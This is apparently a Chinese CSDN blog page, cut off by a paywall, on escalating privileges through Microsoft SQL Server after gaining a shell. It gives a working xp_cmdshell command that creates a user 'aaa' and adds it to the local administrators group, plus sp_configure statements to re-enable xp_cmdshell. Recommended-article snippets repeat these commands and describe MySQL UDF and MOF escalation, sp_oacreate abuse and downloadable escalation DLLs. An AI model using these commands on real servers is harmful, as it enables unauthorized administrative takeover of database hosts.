mysql 2008提权_通过Mssql提权的几种姿势

最新推荐文章于 2024-03-24 14:46:00 发布
最新推荐文章于 2024-03-24 14:46:00 发布
阅读量299 收藏 1
点赞数
文章标签: mysql 2008提权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_33134753/article/details/114743274
版权

本文记录针对SQL Server数据库,在拿到shell之后进行提权的5种方法。

一、 xp_cmdshell提权

f856e12a5209efd1baad1d000ce7cb1c.png

上面的数据库连接需要知道sa的密码,连接之后,在下面的sql命令处执行:

exec xp_cmdshell 'net user aaa aaa /add && net localgroup administrators aaa /add'

就能成功的创建一个账户aaa并且加到管理员组:

ea922f6778f9ab420f00c2d3e79a6fc9.png

常见问题:

如果执行sql语句不成功,首先检查判断xp_cmdshell是否存在:

select count(*)from master.dbo.sysobjects where xtype = 'x' and name = 'xp_cmdshell' ;

b474ef129805bc0e8f99628c2a3afcac.png

返回1是存在的,返回0则需要通过xplog70.dll恢复。

然后需要开启xp_cmdshell

EXEC sp_configure 'show advanced options', 1 ;

Reconfigure;

EXEC sp_configure 'xp_cmdshell', 1 ; --开启xp_cmdshell,如果关闭,需要将这里的1改为"0"

RECONFIGURE ; --以上命令开启用xp_cmdshell

这四条语句一起执行,然后语句中间没有空格,执行后可启用。

二、s

最低0.47元/天 解锁文章
文森特·凡喵
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql数据库提权所需lib_mysqludf_sys_64.dll(64位)
10-03
提权必备,之后会出对应的提权教程
mssql数据库提权之——xp_cmdshell执行系统命令
01-19
条件 所谓利用数据进行提权,利用的其实是数据库的运行权限,所以只要我们满足以下条件即可进行提权: 1、 必须获得sa的账号密码或者与sa相同权限的账号密码,且mssql没有被降权。 2、 必须可以以某种方式执行sql语句,例如:webshell或者是1433端口的连接。 提权基本思路过程与原理 1.MSSQLWindows server类的操作系统上,默认具有system权限。System权限在Windows server2003中权限仅比管理员小;而在2003以上的版本,则为最高权限。 2.获取webshell之后可尝试在服务器各个站点的目录寻找sa的密码(某些站点直接在web应用程序中使
MySQL提权
热门推荐
Grey的博客
05-12 3万+
一、Mysql提权必备条件1.服务器安装Mysql数据库利用Mysql提权的前提就是服务器安装了mysql数据库,且mysql的服务没有降权,Mysql数据库默认安装是以系统权限继承的,并且需要获取Mysql root账号密码。2.判断Mysql服务运行权限对于Mysql数据库服务运行权限有很多方法,我这里主要介绍三种,一种是通过查看系统账号,也即使用“net user”命令查看系统当前账号,如果...
权限提升-Windows权限提升篇&数据库篇&MYSQL&MSSQL&ORACLE&自动化项目
siu~
03-24 710
1、Web到Win-数据库提权-MSSQL 2、Web到Win-数据库提权-MYSQL 3、Web到Win-数据库提权-Oracle 章节点: 1、Web权限提升及转移 2、系统权限提升及转移 3、宿主权限提升及转移 4、域控权限提升及转移
mysql普通用户需要哪些权限,windows服务器下,用普通用户权限来运行mysql
weixin_36257759的博客
03-18 393
Windows下降权MYSQL和apche的运行级别(普通用户权限运行)1、MYSQL的降权运行新建立一个用户比如mysqlnet user mysql microsoft /addnetlocalgroup users mysql /del不属于任何组如果MYSQL装在d:\mysql ,那么,给 mysql完全控制 的权限然后在系统服务中设置,MYSQL的服务属性,在登录属性当中,选择此用户m...
内网学习之MySQL服务提权
imherer的博客
02-08 429
利用MySQL提权原理: 1、具有mysql的root权限,且mysql以system权限运行。 2、具有执行sql语句的权限,webshell或者外连皆可 UDF提权 UDF(user defined function 用户自定义函数)提权,要求有写权限(secure_file_priv要么为空,要么设置路径),单引号未被过滤 原理: UDF可以理解为MySQL的函数库,可以利用UDF定义创建函数。(其中包括了执行系统命令的函数)要想利用udf,必须上传udf.dll作为udf...
windows系统安全
qq_23435961的博客
04-12 1732
windows系统安全
数据库提权_攻防
weixin_39953838的博客
01-15 1213
离别不是结束,遗忘才是!
mysql 2008提权_实战SQL Server提权
weixin_35501678的博客
01-27 227
前言:在授权测试一网站时发现该网站已经被挂马。。aspx木马猜测出密码为admin,即可看到大马。。尝试自己的小马+菜刀进行连接。。拒绝访问发现该网站根目录下所有文件进行了访问控制。。无法上传自己的小马。没有办法,只能翻翻文件看看。。公众号getshell看到了公众号的配置以及地址。。(打马的地方)该文件夹下没有做访问控制,顺利上传getshell。。uploadsuccessok!添加管理员,打...
mysql.zip_ROOT_mysql提权_udf_udf mysql_提权
09-19
提权用的 udf 得到root帐号可以用这个提权
udf提权_udf提权_udf.dll下载提权_mysql提权_ballsv6_提权_源码
10-04
mysql提权,udf提权所需要的dll文件,有64位和32位
必备神器->MYSQL高版本提权工具-V 2011
01-19
必备神器->MYSQL高版本提权工具-V 2011
Mysql 权限提权实例教程.doc
01-03
Mysql权限提取实例教程, 利用mysql提权的前提就是,服务器安装了mysql,mysql的服务没有降权,(降权也可以提,没降权的话就最好了),是默认安装以系统权限继承的(system权限). 并且获得了root的账号密码
SQL Server 数据库提权几种方法——提权教程
W小哥
01-20 1万+
一、简介 在利用系统溢出漏洞没有效果的情况下,可以采用数据库进行提权。 数据库提权的前提条件: 1、服务器开启数据库服务 2、获取到最高权限用户密码 (除Access数据库外,其他数据库基本都存在数据库提权的可能) 二、使用xp_cmdshell进行提权 xp_cmdshell默认在mssql2000中是开启的,在mssql2005之后的版本中则默认禁止。如果用户拥有管理员sa权限则可以用sp_configure重新开启它。 启用: EXEC sp_configure ‘show advanced opti
Mssql提权
weixin_33810302的博客
05-16 367
一、xp_cmdshell提权 首先使用sqlmap查看是DBA权限,通过xp_cmdshell来执行命令 默认情况下是关闭的,用下边的命令开启 EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE; 如果xp_cmdshell被删除,可...
SQL Server】sp_oacreate获取服务器最高权限
qq_43665434的博客
05-23 2108
SQL Server】sp_oacreate获取服务器最高权限 前言 使用sp_oacreate的提权语句,主要是用来调用OLE对象(Object Linking and Embedding的缩写,VB中的OLE对象),利用OLE对象的run方法执行系统命令。在oacreate的官方文档里明确指出了,如果要使用OLE对象,必须要开启 ‘Ole Automation Procedures’,也就是EXEC sp_configure 'Ole Automation Procedures', 1;执行这条语句
高端商务活动策划商业计划书PPT模板
最新发布
07-12
【作品名称】:高端商务活动策划商业计划书PPT模板 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
mysql mof提权原理_mof提权原理及其过程
05-16
Mof文件是一种WMI(Windows Management Instrumentation)的文件格式,用于描述WMI类和实例,其中包含了一些WMI类的定义和方法,可以通过WMI来执行一些系统管理的任务。而Mof提权则是一种利用Mof文件来提升权限的攻击方式。 Mof提权的原理是通过创建一个恶意的Mof文件,并将其注册到WMI中,然后利用WMI的执行权限来执行Mof文件中的命令,从而实现提权。具体过程如下: 1. 创建一个恶意的Mof文件,并将其中的类名定义为“__EventFilter”,其中包含一个“CreationClassName”属性,用于指定类的创建者。 2. 注册Mof文件到WMI中,使用“mofcomp.exe”工具将Mof文件编译成WMI可识别的格式,并使用“wmic.exe”工具将其注册到WMI中。 3. 当用户登录系统时,WMI会自动执行Mof文件中的代码,并将当前用户的权限提升为“SYSTEM”级别,从而实现提权。 需要注意的是,Mof提权需要具备本地管理员权限才能执行,因此其攻击范围相对有限。为了防止Mof提权攻击,可以使用安全软件对系统进行监控和防护,及时发现和阻止恶意Mof文件的注册和执行。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值